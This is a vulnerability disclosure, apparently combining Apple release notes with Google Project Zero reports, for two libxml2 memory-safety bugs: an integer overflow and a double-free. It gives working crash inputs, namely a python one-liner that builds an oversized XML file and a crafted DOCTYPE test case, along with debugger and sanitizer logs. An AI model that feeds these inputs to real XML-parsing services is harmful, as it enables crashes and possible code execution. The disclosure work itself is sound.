Maddle Stone, Ned Williamson and Nathan Wachholz
Two security patch for libxml2 on macOS Ventura 13.0.1, iOS 16.1.1 and iPadOS 16.1.1
Released November 9, 2022
libxml2
Available for: macOS Ventura, iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution
Description: An integer overflow was addressed through improved input validation.
CVE-2022-40303: Maddie Stone of Google Project Zero
libxml2
Available for: macOS Ventura, iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution
Description: This issue was addressed with improved checks.
CVE-2022-40304: Ned Williamson and Nathan Wachholz of Google Project Zero
[CVE-2022-40303] Integer overflow in xmlParseNameComplex
Libxml2 is vulnerable to an integer overflow in xmlParseNameComplex
when an attribute list has a very long name (name is >= 2**32 characters).
static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) {
int len = 0, l;
[...]
return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));
}
If the name is greater than or equal to 2**32 characters, then len
overflows. The calculation for the second argument to xmlDictLookup (ctxt->input->cur - len
) will point to an address outside of the buffer such as adding 0x80000000 to cur
.
Exploiting this issue using static XML requires that the XML_PARSE_HUGE
flag is used to disable hardcoded parser limits. Though similar to Felix’s report (CVE-2022-29824) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this.
Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky.
Proof of Concept:
$ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > /tmp/name_big.xml
$ ./xmllint --huge /tmp/name_big.xml
Program received signal SIGSEGV, Segmentation fault.
__strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77
77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory.
(gdb) bt
#0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77
#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)
at /usr/local/google/home/maddiestone/libxml2/dict.c:878
#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617
#3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682
#4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729
#5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754
#6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407
#7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165
#8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0)
at /usr/local/google/home/maddiestone/libxml2/parser.c:17044
#9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128)
at /usr/local/google/home/maddiestone/libxml2/parser.c:17109
#10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0)
at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366
#11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757
(gdb) up
#1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648)
at /usr/local/google/home/maddiestone/libxml2/dict.c:878
878 l = strlen((const char *) name);
(gdb) up
#2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617
3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len));
(gdb) p/x len
$5 = 0x80000000
(gdb) p/x $_siginfo
$6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e,
si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e,
si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0,
si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = {
si_band = 0x7ffff795602e, si_fd = 0x0}}}
(gdb) p/x ctxt->input->cur
$7 = 0x7fff7795602e
[CVE-2022-40304] Double-free when parsing default attributes
Test Case
<!DOCTYPE A SYSTEM ""
[
<!ENTITY ENT_A SYSTEM "" NDATA A>
<!ENTITY ENT_B "&ENT_A;&ENT_B;">
<!ATTLIST A C CDATA "">
<!ATTLIST A D CDATA "">
<!ATTLIST A E CDATA "">
<!ATTLIST A F CDATA "">
<!ATTLIST A G CDATA "&ENT_B;">
]>
Reproducing the Issue
Simply run xmllint
on the provided test case.
The bucket used in the hash function is affected by the random seed value used in hash randomization, therefore the test case may need to be run multiple times (by xmllint or any other parser using libxml2) to see the crash due to the system time being used to select the random seed.
Explanation
libxml2
uses a custom hash table implementation throughout its codebase. The hash table maintains a buffer where strings representing dictionary keys are stored allowing for a consistent ownership model. This functionality is exposed in some functions, for example, xmlDictLookup
.
/**
* xmlDictLookup:
* @dict: the dictionary
* @name: the name of the userdata
* @len: the length of the name, if -1 it is recomputed
*
* Add the @name to the dictionary @dict if not present.
*
* Returns the internal copy of the name or NULL in case of internal error
*/
const xmlChar *xmlDictLookup(xmlDictPtr dict, const xmlChar *name, int len) {
There's a problem when handling the nested entities while parsing the last attribute list:
void xmlParseAttributeListDecl(xmlParserCtxtPtr ctxt) {
const xmlChar *elemName;
const xmlChar *attrName;
xmlEnumerationPtr tree;
if (CMP9(CUR_PTR, '<', '!', 'A', 'T', 'T', 'L', 'I', 'S', 'T')) {
// ...
elemName = xmlParseName(ctxt); // [1]
if (elemName == NULL) {
xmlFatalErrMsg(ctxt, XML_ERR_NAME_REQUIRED,
"ATTLIST: no name for Element\n");
return;
}
while ((RAW != '>') && (ctxt->instate != XML_PARSER_EOF)) {
// ...
def = xmlParseDefaultDecl(ctxt, &defaultValue); // [2]
if (def <= 0) {
if (defaultValue != NULL)
xmlFree(defaultValue);
if (tree != NULL)
xmlFreeEnumeration(tree);
break;
}
if ((ctxt->sax2) && (defaultValue != NULL) &&
(def != XML_ATTRIBUTE_IMPLIED) && (def != XML_ATTRIBUTE_REQUIRED)) {
xmlAddDefAttrs(ctxt, elemName, attrName, defaultValue); // [3]
}
// ...
}
When parsing attribute declaration lists as used in the testcase, xmlParseAttributeListDecl
will parse attribute default declarations [2] (e.g. #REQUIRED
, #IMPLIED
, #FIXED
) before adding the defaulted attribute for the specified element [3].
The issue is that xmlParseName
[1] returns into elemName
the internal copy of the string for the parsed name, in this case A
. xmlParseDefaultDecl
[2] will try to resolve the nested entity references for the last ATTLIST
entry in the provided testcase, but due to a reference loop it will hit the depth limit and fail.
When failing, ent->content[0]
is set to 0, meaning the string pointed to by ent->content
is set to the empty string. ent->content
is set earlier in a call to xmlCreateEntity
. The pointer is set to the result of an xmlDictLookup
call. Recall that this returns the internal instance of the A
string.
xmlChar *xmlStringLenDecodeEntities(xmlParserCtxtPtr ctxt, const xmlChar *str,
int len, int what, xmlChar end,
xmlChar end2, xmlChar end3) {
// ...
} else if ((ent != NULL) && (ent->content != NULL)) {
ctxt->depth++;
rep = xmlStringDecodeEntities(ctxt, ent->content, what, 0, 0, 0);
ctxt->depth--;
if (rep == NULL) {
ent->content[0] = 0; // The pointer to the "A" string is cleared.
goto int_error;
}
Therefore we are now in a state where a hash table’s internal string representation for the empty string is duplicated. This leads to issues later on when xmlAddDefAttrs
is called [3].
For reference, you can see that the entity was initialized here and the content pointer was indeed set to an internal string reference.
static xmlEntityPtr xmlCreateEntity(xmlDictPtr dict, const xmlChar *name,
int type, const xmlChar *ExternalID,
const xmlChar *SystemID,
const xmlChar *content) {
// ...
if (content != NULL) {
ret->length = xmlStrlen(content);
if ((dict != NULL) && (ret->length < 5))
ret->content = (xmlChar *)xmlDictLookup(dict, content, ret->length);
Now when xmlAddDefAttrs
is called, elemName
which originally pointed to A
now points to the empty string without its pointer value having been modified. This becomes a memory corruption issue as shown below:
static void xmlAddDefAttrs(xmlParserCtxtPtr ctxt, const xmlChar *fullname,
const xmlChar *fullattr, const xmlChar *value) {
// ...
defaults = xmlHashLookup2(ctxt->attsDefault, name, prefix);
if (defaults == NULL) {
defaults = (xmlDefAttrsPtr)xmlMalloc(sizeof(xmlDefAttrs) +
(4 * 5) * sizeof(const xmlChar *));
if (defaults == NULL)
goto mem_error;
defaults->nbAttrs = 0;
defaults->maxAttrs = 4;
if (xmlHashUpdateEntry2(ctxt->attsDefault, name, prefix, defaults, NULL) <
0) {
xmlFree(defaults);
goto mem_error;
}
} else if (defaults->nbAttrs >= defaults->maxAttrs) {
xmlDefAttrsPtr temp;
temp = (xmlDefAttrsPtr)xmlRealloc(
defaults, sizeof(xmlDefAttrs) +
(2 * defaults->maxAttrs * 5) * sizeof(const xmlChar *));
if (temp == NULL)
goto mem_error;
defaults = temp;
defaults->maxAttrs *= 2;
if (xmlHashUpdateEntry2(ctxt->attsDefault, name, prefix, defaults, NULL) <
0) {
xmlFree(defaults);
goto mem_error;
}
}
xmlHashLookup2
will try to lookup the empty string entry first using the pointer value, and if it fails will use the string comparison function to look for the entry. xmlHashUpdateEntry2
on the other hand will only use the pointer value if the internal dict containing string copies is present. Because there are now two internal strings which contain the empty string, in the lookup case it will match if the lookup happens to land in the correct bucket and in the update case it will never match because the pointers don’t match. The bucket used in the hash function is affected by the random seed value used in hash randomization, therefore the test case may need to be run multiple times (by xmllint
or any other parser using libxml2
) to see the crash.
The existing default attributes list is sometimes found by the first lookup call and never found in the insert call. In the case where the lookup finds the existing default attributes, the realloc
call can free it (with more than 4 attributes as in this testcase) but will not remove the pointer during the update. In the case where the lookup does not find the default attributes, it will not be freed and instead will be leaked when the new allocation is made.
Issues
Clearing ent->content[0]
can break dictionary string semantics.
The behavior of Lookup/Insert is different for dictionaries containing internal dict references which is exacerbated by the corruption of an internal string noted above.
Reccomended Fix
Either: (1) avoid modifying ent->content
by looking up the empty string in the dict if needed instead of modifying the existing value or (2) make the semantics consistent between lookup and insert. I believe (1) is a more fundamental fix for the problem as the lookup/insert semantics aren’t inherently a problem.
Additionally, we recommend fuzzing with the hash list randomization on but using a non time-based seed drawn from the test case.
Crash Log
Line numbers in this testcase may not match your version as I applied clang-format before my review/fuzzing efforts.
==675853==ERROR: AddressSanitizer: attempting double-free on 0x60f000000130 in thread T0:
#0 0x55623faa2117 in __interceptor_free.part.0 llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:52:3
#1 0x55623fb44467 in xmlHashDefaultDeallocator libxml2/hash.c:375:3
#2 0x55623fb44026 in xmlHashFree libxml2/hash.c:341:11
#3 0x55623fc063ed in xmlFreeParserCtxt libxml2/parserInternals.c:1654:5
#4 0x55623fbed12b in xmlDoRead libxml2/parser.c:14847:5
#5 0x55623fbed227 in xmlReadFile libxml2/parser.c:14895:11
#6 0x55623faf1f8d in parseAndPrintFile libxml2/xmllint.c:2258:19
#7 0x55623faea403 in main libxml2/xmllint.c:3647:13
#8 0x7fe8af1ee7fc in __libc_start_main csu/../csu/libc-start.c:332:16
0x60f000000130 is located 0 bytes inside of 168-byte region [0x60f000000130,0x60f0000001d8)
freed by thread T0 here:
#0 0x55623faa223f in __interceptor_realloc.part.0 llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:85:3
#1 0x55623fbb2107 in xmlAddDefAttrs libxml2/parser.c:1243:28
#2 0x55623fbb1511 in xmlParseAttributeListDecl libxml2/parser.c:5917:9
#3 0x55623fbb7b37 in xmlParseMarkupDecl libxml2/parser.c:6731:9
#4 0x55623fbd5a87 in xmlParseInternalSubset libxml2/parser.c:8184:7
#5 0x55623fbd42ac in xmlParseDocument libxml2/parser.c:10575:7
#6 0x55623fbed067 in xmlDoRead libxml2/parser.c:14836:3
#7 0x55623fbed227 in xmlReadFile libxml2/parser.c:14895:11
#8 0x55623faf1f8d in parseAndPrintFile libxml2/xmllint.c:2258:19
#9 0x55623faea403 in main libxml2/xmllint.c:3647:13
#10 0x7fe8af1ee7fc in __libc_start_main csu/../csu/libc-start.c:332:16
previously allocated by thread T0 here:
#0 0x55623faa32df in __interceptor_malloc llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:69:3
#1 0x55623fbb2016 in xmlAddDefAttrs libxml2/parser.c:1228:32
#2 0x55623fbb1511 in xmlParseAttributeListDecl libxml2/parser.c:5917:9
#3 0x55623fbb7b37 in xmlParseMarkupDecl libxml2/parser.c:6731:9
#4 0x55623fbd5a87 in xmlParseInternalSubset libxml2/parser.c:8184:7
#5 0x55623fbd42ac in xmlParseDocument libxml2/parser.c:10575:7
#6 0x55623fbed067 in xmlDoRead libxml2/parser.c:14836:3
#7 0x55623fbed227 in xmlReadFile libxml2/parser.c:14895:11
#8 0x55623faf1f8d in parseAndPrintFile libxml2/xmllint.c:2258:19
#9 0x55623faea403 in main libxml2/xmllint.c:3647:13
#10 0x7fe8af1ee7fc in __libc_start_main csu/../csu/libc-start.c:332:16
SUMMARY: AddressSanitizer: double-free llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:52:3 in __interceptor_free.part.0